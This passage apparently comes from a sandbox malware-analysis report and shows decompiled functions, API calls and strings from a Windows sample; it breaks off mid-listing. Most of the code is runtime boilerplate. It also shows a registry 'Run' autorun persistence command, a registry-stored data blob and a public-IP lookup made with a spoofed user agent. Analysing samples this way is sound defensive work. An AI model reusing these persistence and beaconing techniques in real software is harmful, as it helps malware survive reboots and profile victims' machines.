reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v game342 /t REG_SZ /d ", xrefs: 0041FE20
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 0041FDCD
" /f, xrefs: 0041FE52

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0041FE90, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45

C-Code - Quality: 100%

			E0041FE90(struct HDC__* __edi, struct tagRECT* __esi) {
				void* _t10;

				_t10 = CreateFontW(0x12, 0, 0, 0, 0x2bc, 0, 0, 0, 1, 0, 0, 0, 0x20, L"Tahoma");
				SelectObject(__edi, _t10);
				 *__esi = 0xa;
				__esi->top = 0xa;
				DrawTextA(__edi, 0x462918, 0xffffffff, __esi, 0x400);
				DrawTextA(__edi, 0x462918, 0xffffffff, __esi, 0x10);
				SelectObject(__edi, GetStockObject(0xd));
				DeleteObject(_t10);
				return __esi;
			}

0x0041febb
0x0041febf
0x0041fed3
0x0041fed9
0x0041fee0
0x0041fef1
0x0041ff01
0x0041ff08
0x0041ff11

APIs

CreateFontW.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,Tahoma), ref: 0041FEB5
SelectObject.GDI32(00000000,00000000), ref: 0041FEBF
DrawTextA.USER32(00000000,00462918,000000FF,?,00000400), ref: 0041FEE0
DrawTextA.USER32(00000000,00462918,000000FF,?,00000010), ref: 0041FEF1
GetStockObject.GDI32(0000000D), ref: 0041FEF9
SelectObject.GDI32(00000000,00000000), ref: 0041FF01
DeleteObject.GDI32(00000000), ref: 0041FF08

Strings

Tahoma, xrefs: 0041FE93

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 004289D5, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148

C-Code - Quality: 73%

			E004289D5(void* __edx, WCHAR* _a4) {
				signed int _v8;
				struct HINSTANCE__* _v9;
				void _v508;
				long _v512;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				signed int _t23;
				short _t28;
				void* _t32;
				void* _t34;
				void* _t37;
				long _t38;
				void* _t39;
				struct HINSTANCE__* _t41;
				void* _t42;
				void* _t54;
				long _t56;
				void* _t57;
				WCHAR* _t60;
				void* _t61;
				void* _t62;
				signed int _t64;
				signed int _t66;
				void* _t67;
				void* _t69;

				_t54 = __edx;
				_t64 = _t66;
				_t67 = _t66 - 0x1fc;
				_t18 =  *0x43f054; // 0xd46ffb00
				_v8 = _t18 ^ _t64;
				_t60 = _a4;
				_t56 = E004289AF(_t60);
				_t41 = 0;
				_v512 = _t56;
				if(_t56 != 0) {
					if(E0042D651(3) == 1 || E0042D651(3) == 0 &&  *0x43f050 == 1) {
						_t62 = GetStdHandle(0xfffffff4);
						if(_t62 != _t41 && _t62 != 0xffffffff) {
							_t23 = 0;
							while(1) {
								 *((char*)(_t64 + _t23 - 0x1f8)) =  *((intOrPtr*)(_t56 + _t23 * 2));
								if( *((intOrPtr*)(_t56 + _t23 * 2)) == _t41) {
									break;
								}
								_t23 = _t23 + 1;
								if(_t23 < 0x1f4) {
									continue;
								}
								break;
							}
							_v9 = _t41;
							_t20 = WriteFile(_t62,  &_v508, E0042D200( &_v508),  &_v512, _t41);
						}
					} else {
						if(_t60 != 0xfc) {
							_t28 = E0042623B(0x440828, 0x314, L"Runtime Error!\n\nProgram: ");
							_t69 = _t67 + 0xc;
							if(_t28 != 0) {
								_push(_t41);
								_push(_t41);
								_push(_t41);
								_push(_t41);
								_push(_t41);
								goto L10;
							} else {
								_t60 = 0x44085a;
								 *0x440a62 = _t28;
								_t38 = GetModuleFileNameW(_t41, 0x44085a, 0x104);
								_t41 = 0x2fb;
								if(_t38 == 0) {
									_t39 = E0042623B(0x44085a, 0x2fb, L"<program name unknown>");
									_t69 = _t69 + 0xc;
									if(_t39 != 0) {
										L9:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L10:
										E00427081();
									}
								}
							}
							if(E0042AD8C(_t60) + 1 > 0x3c) {
								_t41 = _t41 - (0x4407e4 + E0042AD8C(_t60) * 2 - _t60 >> 1);
								_t37 = E00425E37(0x4407e4 + E0042AD8C(_t60) * 2, _t41, L"...", 3);
								_t69 = _t69 + 0x14;
								if(_t37 != 0) {
									goto L9;
								}
							}
							_t60 = 0x314;
							_t32 = E00425ACD(0x440828, 0x314, L"\n\n");
							_t69 = _t69 + 0xc;
							if(_t32 != 0) {
								goto L9;
							}
							_t34 = E00425ACD(0x440828, 0x314, _v512);
							_t69 = _t69 + 0xc;
							if(_t34 != 0) {
								goto L9;
							}
							_t20 = E0042D4E5(_t54, 0x440828, L"Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				_pop(_t57);
				_pop(_t61);
				_pop(_t42);
				return E004256FE(_t20, _t42, _v8 ^ _t64, _t54, _t57, _t61);
			}

0x004289d5
0x004289d8
0x004289da
0x004289e0
0x004289e7
0x004289ec
0x004289f6
0x004289f8
0x004289fb
0x00428a03
0x00428a14
0x00428b29
0x00428b2d
0x00428b34
0x00428b36
0x00428b39
0x00428b44
0x00000000
0x00000000
0x00428b46
0x00428b4c
0x00000000
0x00000000
0x00000000
0x00428b4c
0x00428b5d
0x00428b6f
0x00428b6f
0x00428a33
0x00428a39
0x00428a4f
0x00428a54
0x00428a59
0x00428b17
0x00428b18
0x00428b19
0x00428b1a
0x00428b1b
0x00000000
0x00428a5f
0x00428a64
0x00428a6b
0x00428a71
0x00428a77
0x00428a7e
0x00428a87
0x00428a8c
0x00428a91
0x00428a93
0x00428a95
0x00428a96
0x00428a97
0x00428a98
0x00428a99
0x00428a9a
0x00428a9a
0x00428a9a
0x00428a91
0x00428a7e
0x00428aaa
0x00428ac6
0x00428aca
0x00428acf
0x00428ad4
0x00000000
0x00000000
0x00428ad4
0x00428adb
0x00428ae2
0x00428ae7
0x00428aec
0x00000000
0x00000000
0x00428af6
0x00428afb
0x00428b00
0x00000000
0x00000000
0x00428b0d
0x00428b12
0x00428a39
0x00428a14
0x00428b78
0x00428b79
0x00428b7c
0x00428b83

APIs

GetModuleFileNameW.KERNEL32(00000000,0044085A,00000104,00000001,00000000,00000000), ref: 00428A71

Part of subcall function 00427081: GetCurrentProcess.KERNEL32(C0000417), ref: 00427097
Part of subcall function 00427081: TerminateProcess.KERNEL32(00000000), ref: 0042709E

Part of subcall function 0042D4E5: LoadLibraryW.KERNEL32(USER32.DLL), ref: 0042D520
Part of subcall function 0042D4E5: GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 0042D53C
Part of subcall function 0042D4E5: EncodePointer.KERNEL32(00000000), ref: 0042D54D
Part of subcall function 0042D4E5: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0042D55A
Part of subcall function 0042D4E5: EncodePointer.KERNEL32(00000000), ref: 0042D55D
Part of subcall function 0042D4E5: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0042D56A
Part of subcall function 0042D4E5: EncodePointer.KERNEL32(00000000), ref: 0042D56D
Part of subcall function 0042D4E5: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 0042D57A
Part of subcall function 0042D4E5: EncodePointer.KERNEL32(00000000), ref: 0042D57D
Part of subcall function 0042D4E5: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0042D58E
Part of subcall function 0042D4E5: EncodePointer.KERNEL32(00000000), ref: 0042D591
Part of subcall function 0042D4E5: DecodePointer.KERNEL32(00000000,00440828,00000314,00000000), ref: 0042D5B3
Part of subcall function 0042D4E5: DecodePointer.KERNEL32 ref: 0042D5BD
Part of subcall function 0042D4E5: DecodePointer.KERNEL32(?,00440828,00000314,00000000), ref: 0042D5FC
Part of subcall function 0042D4E5: DecodePointer.KERNEL32(?), ref: 0042D616
Part of subcall function 0042D4E5: DecodePointer.KERNEL32(00440828,00000314,00000000), ref: 0042D62A

GetStdHandle.KERNEL32(000000F4,00000001,00000000,00000000), ref: 00428B23
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00428B6F

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

Runtime Error!Program: , xrefs: 00428A3F
..., xrefs: 00428AC1
Microsoft Visual C++ Runtime Library, xrefs: 00428B07
<program name unknown>, xrefs: 00428A80

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 004010C0, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 103

C-Code - Quality: 15%

			E004010C0(void* __ebx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v135;
				char _v136;
				char _v263;
				char _v264;
				void* _v268;
				int _v272;
				int _v276;
				void* __esi;
				signed int _t25;
				long _t35;
				void* _t46;
				void* _t61;
				void* _t62;
				void* _t64;
				signed int _t69;

				_t61 = __edi;
				_t46 = __ebx;
				_t66 = _t69;
				_t25 =  *0x43f054; // 0xd46ffb00
				_v8 = _t25 ^ _t69;
				_v264 = 0;
				E0042D0A0( &_v263, 0, 0x7f);
				_v136 = 0;
				E0042D0A0( &_v135, 0, 0x7f);
				E0042D0A0(0x441d58, 0, 0x100);
				_v272 = 0x100;
				E00401CE0(0x80,  &_v136, "Software\\%S", 0x441d28);
				if(_a4 == 0) {
					_push(0);
					_push( &_v268);
					_push(0);
					_push(0x20019);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v136);
					_push(0x80000001);
				} else {
					E00425A6E( &_v264, 0x80, "S-1-5-18\\");
					E00425D48( &_v264, 0x80,  &_v136);
					_push(0);
					_push( &_v268);
					_push(0);
					_push(0x20019);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v264);
					_push(0x80000003);
				}
				RegCreateKeyExA();
				_t35 = RegQueryValueExA(_v268, "data", 0,  &_v276, 0x441d58,  &_v272);
				RegCloseKey(_v268);
				_t64 = _t62;
				if(_t35 == 0) {
					return E004256FE(0 | _v272 == 0x00000100, _t46, _v8 ^ _t66,  &_v276, _t61, _t64);
				} else {
					return E004256FE(0, _t46, _v8 ^ _t66,  &_v276, _t61, _t64);
				}
			}

0x004010c0
0x004010c0
0x004010c3
0x004010cb
0x004010d2
0x004010e0
0x004010e7
0x004010f7
0x004010fe
0x0040110f
0x0040112a
0x00401134
0x00401140
0x00401197
0x0040119f
0x004011a0
0x004011a2
0x004011a7
0x004011a9
0x004011ab
0x004011b3
0x004011b4
0x00401142
0x00401153
0x0040116b
0x00401173
0x0040117b
0x0040117c
0x0040117e
0x00401183
0x00401185
0x00401187
0x0040118f
0x00401190
0x00401190
0x004011b9
0x004011e1
0x004011f0
0x004011f8
0x004011f9
0x00401227
0x004011fb
0x0040120a
0x0040120a

APIs

RegCreateKeyExA.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 004011B9
RegQueryValueExA.ADVAPI32(?,data,00000000,?,00441D58,00000100), ref: 004011E1
RegCloseKey.ADVAPI32(?), ref: 004011F0

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

oH4v~@4v, xrefs: 004011E1
data, xrefs: 004011DB
Software\%S, xrefs: 0040111F
S-1-5-18\, xrefs: 00401142

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0041BA30, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74

C-Code - Quality: 72%

			E0041BA30(void* __ebx, void* __edx) {
				signed int _v8;
				char _v1031;
				char _v1032;
				char _v1036;
				void* __edi;
				void* __esi;
				signed int _t12;
				char* _t20;
				int _t23;
				int _t25;
				void* _t34;
				void* _t38;
				void* _t39;
				void* _t40;
				void* _t42;
				void* _t44;
				void* _t45;
				signed int _t47;
				signed int _t50;

				_t34 = __edx;
				_t27 = __ebx;
				_t47 = _t50;
				_t12 =  *0x43f054; // 0xd46ffb00
				_v8 = _t12 ^ _t47;
				_v1032 = 0;
				E0042D0A0( &_v1031, 0, 0x3ff);
				_t38 = InternetOpenA("Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko", 4, 0, 0, 0);
				_t42 = InternetOpenUrlW(_t38, L"http://ip.tyk.nu/", 0, 0, 0x40000000, 0);
				if(_t42 != 0) {
					E0041BB40( &_v1032, 0xc8, _t42,  &_v1036);
					_t20 = _t47 + _v1036 - 0x405;
					if( *_t20 == 0xa) {
						 *_t20 = 0;
					}
					E00425A6E(0x46284c, 0x13,  &_v1032);
					InternetCloseHandle(_t42);
					_t23 = InternetCloseHandle(_t38);
					_pop(_t39);
					_pop(_t44);
					return E004256FE(_t23, _t27, _v8 ^ _t47,  &_v1032, _t39, _t44);
				} else {
					_t25 = InternetCloseHandle(_t38);
					_pop(_t40);
					_pop(_t45);
					return E004256FE(_t25, __ebx, _v8 ^ _t47, _t34, _t40, _t45);
				}
			}

0x0041ba30
0x0041ba30
0x0041ba33
0x0041ba3b
0x0041ba42
0x0041ba55
0x0041ba5c
0x0041ba82
0x0041ba90
0x0041ba94
0x0041bac0
0x0041bacb
0x0041bad8
0x0041bada
0x0041bada
0x0041baeb
0x0041bafa
0x0041bafd
0x0041bb02
0x0041bb05
0x0041bb0e
0x0041ba96
0x0041ba97
0x0041ba9d
0x0041ba9e
0x0041baac
0x0041baac

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko,00000004,00000000,00000000,00000000), ref: 0041BA71
InternetOpenUrlW.WININET(00000000,http://ip.tyk.nu/,00000000,00000000,40000000,00000000), ref: 0041BA8A
InternetCloseHandle.WININET(00000000), ref: 0041BA97
InternetCloseHandle.WININET(00000000), ref: 0041BAFA
InternetCloseHandle.WININET(00000000), ref: 0041BAFD

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

http://ip.tyk.nu/, xrefs: 0041BA84
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko, xrefs: 0041BA6C

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00401000, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53

C-Code - Quality: 100%

			E00401000(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v262;
				short _v264;
				void* _v268;
				signed int _t11;
				void* _t34;
				signed int _t37;

				_t35 = _t37;
				_t11 =  *0x43f054; // 0xd46ffb00
				_v8 = _t11 ^ _t37;
				_v264 = 0;
				E0042D0A0( &_v262, 0, 0xfe);
				E00401CB0(0x80,  &_v264, L"Software\\%s", 0x441d28);
				RegCreateKeyExW(0x80000001,  &_v264, 0, 0, 0, 0x20006, 0,  &_v268, 0);
				RegSetValueExW(_v268, L"data", 0, 3, 0x441d58, 0x100);
				RegFlushKey(_v268);
				return E004256FE(RegCloseKey(_v268), __ebx, _v8 ^ _t35, _v268, __edi, __esi, _t34);
			}

0x00401003
0x0040100b
0x00401012
0x00401024
0x0040102b
0x00401046
0x00401070
0x00401090
0x0040109d
0x004010bd

APIs

RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00401070
RegSetValueExW.ADVAPI32(?,data,00000000,00000003,00441D58,00000100), ref: 00401090
RegFlushKey.ADVAPI32(?), ref: 0040109D
RegCloseKey.ADVAPI32(?), ref: 004010AA

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

Software\%s, xrefs: 0040103B
~@4v, xrefs: 00401070
data, xrefs: 0040108A

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042A5AB, Relevance: 12.1, APIs: 8, Instructions: 61

C-Code - Quality: 100%

			E0042A5AB(LONG* _a4) {
				LONG* _t16;
				LONG* _t17;
				LONG* _t18;
				LONG* _t19;
				LONG* _t20;
				LONG* _t21;
				LONG** _t32;
				LONG* _t34;

				_t34 = _a4;
				if(_t34 == 0) {
					L18:
					return _t34;
				}
				InterlockedDecrement(_t34);
				_t2 =  &(_t34[0x2c]); // 0x541b1024
				_t16 =  *_t2;
				if(_t16 != 0) {
					InterlockedDecrement(_t16);
				}
				_t3 =  &(_t34[0x2e]); // 0x824442b
				_t17 =  *_t3;
				if(_t17 != 0) {
					InterlockedDecrement(_t17);
				}
				_t4 =  &(_t34[0x2d]); // 0xdb331424
				_t18 =  *_t4;
				if(_t18 != 0) {
					InterlockedDecrement(_t18);
				}
				_t5 =  &(_t34[0x30]); // 0xd8f7daf7
				_t19 =  *_t5;
				if(_t19 != 0) {
					InterlockedDecrement(_t19);
				}
				_t6 =  &(_t34[0x14]); // 0x42d460
				_t32 = _t6;
				_a4 = 6;
				do {
					if( *((intOrPtr*)(_t32 - 8)) != 0x43f984) {
						_t20 =  *_t32;
						if(_t20 != 0) {
							InterlockedDecrement(_t20);
						}
					}
					if( *((intOrPtr*)(_t32 - 4)) != 0) {
						_t10 =  &(_t32[1]); // 0x8bd88bf1
						_t21 =  *_t10;
						if(_t21 != 0) {
							InterlockedDecrement(_t21);
						}
					}
					_t32 =  &(_t32[4]);
					_t11 =  &_a4;
					 *_t11 = _a4 - 1;
				} while ( *_t11 != 0);
				_t13 =  &(_t34[0x35]); // 0x55ff8b00
				InterlockedDecrement( *_t13 + 0xb4);
				goto L18;
			}

0x0042a5b1
0x0042a5b6
0x0042a63f
0x0042a643
0x0042a643
0x0042a5c5
0x0042a5c7
0x0042a5c7
0x0042a5cf
0x0042a5d2
0x0042a5d2
0x0042a5d4
0x0042a5d4
0x0042a5dc
0x0042a5df
0x0042a5df
0x0042a5e1
0x0042a5e1
0x0042a5e9
0x0042a5ec
0x0042a5ec
0x0042a5ee
0x0042a5ee
0x0042a5f6
0x0042a5f9
0x0042a5f9
0x0042a5fb
0x0042a5fb
0x0042a5fe
0x0042a605
0x0042a60c
0x0042a60e
0x0042a612
0x0042a615
0x0042a615
0x0042a612
0x0042a61b
0x0042a61d
0x0042a61d
0x0042a622
0x0042a625
0x0042a625
0x0042a622
0x0042a627
0x0042a62a
0x0042a62a
0x0042a62a
0x0042a62f
0x0042a63b
0x00000000

APIs

InterlockedDecrement.KERNEL32(0042D410,-0000006C,?,?,?,0042A7BD,-0000006C,-0000006C,00000000,?,0042A836,-0000006C,0043C1D0,0000000C,00425F64,?), ref: 0042A5C5
InterlockedDecrement.KERNEL32(541B1024,?,0042A7BD,-0000006C,-0000006C,00000000,?,0042A836,-0000006C,0043C1D0,0000000C,00425F64,?,?,0042D410), ref: 0042A5D2
InterlockedDecrement.KERNEL32(0824442B,?,0042A7BD,-0000006C,-0000006C,00000000,?,0042A836,-0000006C,0043C1D0,0000000C,00425F64,?,?,0042D410), ref: 0042A5DF
InterlockedDecrement.KERNEL32(DB331424,?,0042A7BD,-0000006C,-0000006C,00000000,?,0042A836,-0000006C,0043C1D0,0000000C,00425F64,?,?,0042D410), ref: 0042A5EC
InterlockedDecrement.KERNEL32(D8F7DAF7,?,0042A7BD,-0000006C,-0000006C,00000000,?,0042A836,-0000006C,0043C1D0,0000000C,00425F64,?,?,0042D410), ref: 0042A5F9
InterlockedDecrement.KERNEL32(D8F7DAF7,?,0042A7BD,-0000006C,-0000006C,00000000,?,0042A836,-0000006C,0043C1D0,0000000C,00425F64,?), ref: 0042A615
InterlockedDecrement.KERNEL32(8BD88BF1,?,0042A7BD,-0000006C,-0000006C,00000000,?,0042A836,-0000006C,0043C1D0,0000000C,00425F64,?), ref: 0042A625
InterlockedDecrement.KERNEL32(55FF8A4C,?,0042A7BD,-0000006C,-0000006C,00000000,?,0042A836,-0000006C,0043C1D0,0000000C,00425F64,?), ref: 0042A63B

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042A51C, Relevance: 12.1, APIs: 8, Instructions: 58

C-Code - Quality: 100%

			E0042A51C(LONG* _a4) {
				LONG* _t15;
				LONG* _t16;
				LONG* _t17;
				LONG* _t18;
				LONG* _t19;
				LONG* _t20;
				LONG** _t30;
				LONG* _t31;

				_t31 = _a4;
				InterlockedIncrement(_t31);
				_t15 = _t31[0x2c];
				if(_t15 != 0) {
					InterlockedIncrement(_t15);
				}
				_t16 = _t31[0x2e];
				if(_t16 != 0) {
					InterlockedIncrement(_t16);
				}
				_t17 = _t31[0x2d];
				if(_t17 != 0) {
					InterlockedIncrement(_t17);
				}
				_t18 = _t31[0x30];
				if(_t18 != 0) {
					InterlockedIncrement(_t18);
				}
				_t6 =  &(_t31[0x14]); // 0x50
				_t30 = _t6;
				_a4 = 6;
				do {
					if( *((intOrPtr*)(_t30 - 8)) != 0x43f984) {
						_t19 =  *_t30;
						if(_t19 != 0) {
							InterlockedIncrement(_t19);
						}
					}
					if( *((intOrPtr*)(_t30 - 4)) != 0) {
						_t20 = _t30[1];
						if(_t20 != 0) {
							InterlockedIncrement(_t20);
						}
					}
					_t30 =  &(_t30[4]);
					_t11 =  &_a4;
					 *_t11 = _a4 - 1;
				} while ( *_t11 != 0);
				return InterlockedIncrement(_t31[0x35] + 0xb4);
			}

0x0042a52a
0x0042a52e
0x0042a530
0x0042a538
0x0042a53b
0x0042a53b
0x0042a53d
0x0042a545
0x0042a548
0x0042a548
0x0042a54a
0x0042a552
0x0042a555
0x0042a555
0x0042a557
0x0042a55f
0x0042a562
0x0042a562
0x0042a564
0x0042a564
0x0042a567
0x0042a56e
0x0042a575
0x0042a577
0x0042a57b
0x0042a57e
0x0042a57e
0x0042a57b
0x0042a584
0x0042a586
0x0042a58b
0x0042a58e
0x0042a58e
0x0042a58b
0x0042a590
0x0042a593
0x0042a593
0x0042a593
0x0042a5aa

APIs

InterlockedIncrement.KERNEL32(00000000,00000001,00000000,?,?,0042A961,?), ref: 0042A52E
InterlockedIncrement.KERNEL32(?,?,?,0042A961,?), ref: 0042A53B
InterlockedIncrement.KERNEL32(?,?,?,0042A961,?), ref: 0042A548
InterlockedIncrement.KERNEL32(?,?,?,0042A961,?), ref: 0042A555
InterlockedIncrement.KERNEL32(?,?,?,0042A961,?), ref: 0042A562
InterlockedIncrement.KERNEL32(?,?,?,0042A961,?), ref: 0042A57E
InterlockedIncrement.KERNEL32(?,?,?,0042A961,?), ref: 0042A58E
InterlockedIncrement.KERNEL32(?,?,?,0042A961,?), ref: 0042A5A4

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042FA96, Relevance: 9.2, APIs: 6, Instructions: 156

C-Code - Quality: 92%

			E0042FA96(void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				signed int _t30;
				signed int _t34;
				signed int _t38;
				void* _t40;
				signed int _t41;
				signed int _t44;
				intOrPtr* _t47;
				void* _t50;
				long _t52;
				void* _t53;
				signed int _t60;
				signed int _t68;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				void* _t75;
				void* _t76;
				void* _t77;
				signed int _t82;

				_t68 = __edx;
				_t60 = 0;
				_v20 = 0;
				_v16 = 0;
				_t30 = E0042C6B7(__ecx, _a4, 0, 0, 1);
				_v28 = _t30;
				_t76 = _t75 + 0x10;
				_v24 = _t68;
				if((_t30 & _t68) == 0xffffffff) {
					L7:
					return  *((intOrPtr*)(E00427125(_t84)));
				}
				_t34 = E0042C6B7(__ecx, _a4, 0, 0, 2);
				_t64 = _t34 & _t68;
				_t77 = _t76 + 0x10;
				if((_t34 & _t68) == 0xffffffff) {
					goto L7;
				}
				_t69 = _a12;
				_t71 = _a8 - _t34;
				_t82 = _t71;
				asm("sbb edi, edx");
				if(_t82 < 0 || _t82 <= 0 && _t71 <= 0) {
					__eflags = _t69 - _t60;
					if(__eflags > 0) {
						goto L31;
					}
					if(__eflags < 0) {
						L27:
						_t38 = E0042C6B7(_t64, _a4, _a8, _a12, _t60);
						_t77 = _t77 + 0x10;
						__eflags = (_t38 & _t68) - 0xffffffff;
						if(__eflags == 0) {
							goto L7;
						}
						_t40 = E0042F2AE(_a4);
						_pop(_t64);
						_t41 = SetEndOfFile(_t40);
						asm("sbb eax, eax");
						_t44 =  ~( ~_t41) - 1;
						asm("cdq");
						_v20 = _t44;
						_v16 = _t68;
						__eflags = (_t44 & _t68) - 0xffffffff;
						if(__eflags != 0) {
							goto L31;
						}
						 *((intOrPtr*)(E00427125(__eflags))) = 0xd;
						_t47 = E00427138(__eflags);
						 *_t47 = GetLastError();
						_t73 = _v20;
						goto L30;
					}
					__eflags = _t71 - _t60;
					if(_t71 >= _t60) {
						goto L31;
					}
					goto L27;
				} else {
					_t50 = HeapAlloc(GetProcessHeap(), 8, 0x1000);
					_v8 = _t50;
					_t84 = _t50;
					if(_t50 != 0) {
						_v12 = E00430278(_a4, 0x8000);
						goto L10;
						do {
							do {
								L10:
								__eflags = _t69;
								if(__eflags < 0) {
									L14:
									_t52 = _t71;
									L15:
									_t53 = E0042C826(0x1000, _t68, _a4, _v8, _t52);
									_t77 = _t77 + 0xc;
									__eflags = _t53 - 0xffffffff;
									if(__eflags == 0) {
										__eflags =  *((intOrPtr*)(E00427138(__eflags))) - 5;
										if(__eflags == 0) {
											 *((intOrPtr*)(E00427125(__eflags))) = 0xd;
										}
										_t73 = _t71 | 0xffffffff;
										_v16 = _t73;
										L20:
										E00430278(_a4, _v12);
										_pop(_t64);
										HeapFree(GetProcessHeap(), 0, _v8);
										_t60 = 0;
										L30:
										__eflags = (_t73 & _v16) - 0xffffffff;
										if(__eflags == 0) {
											goto L7;
										}
										L31:
										__eflags = (E0042C6B7(_t64, _a4, _v28, _v24, _t60) & _t68) - 0xffffffff;
										if(__eflags == 0) {
											goto L7;
										}
										return 0;
									}
									asm("cdq");
									_t71 = _t71 - _t53;
									__eflags = _t71;
									asm("sbb edi, edx");
									if(__eflags < 0) {
										goto L19;
									}
									goto L17;
								}
								if(__eflags > 0) {
									L13:
									_t52 = 0x1000;
									goto L15;
								}
								__eflags = _t71 - 0x1000;
								if(_t71 < 0x1000) {
									goto L14;
								}
								goto L13;
								L17:
							} while (__eflags > 0);
							__eflags = _t71;
						} while (_t71 != 0);
						L19:
						_t73 = _v20;
						goto L20;
					}
					 *((intOrPtr*)(E00427125(_t84))) = 0xc;
					goto L7;
				}
			}

0x0042fa96
0x0042faa1
0x0042faaa
0x0042faad
0x0042fab0
0x0042fab5
0x0042faba
0x0042fabd
0x0042fac3
0x0042fb1e
0x00000000
0x0042fb23
0x0042facc
0x0042fad3
0x0042fad5
0x0042fadb
0x00000000
0x00000000
0x0042fae0
0x0042fae3
0x0042fae3
0x0042fae5
0x0042fae7
0x0042fbb3
0x0042fbb5
0x00000000
0x00000000
0x0042fbb7
0x0042fbbd
0x0042fbc7
0x0042fbce
0x0042fbd1
0x0042fbd4
0x00000000
0x00000000
0x0042fbdd
0x0042fbe2
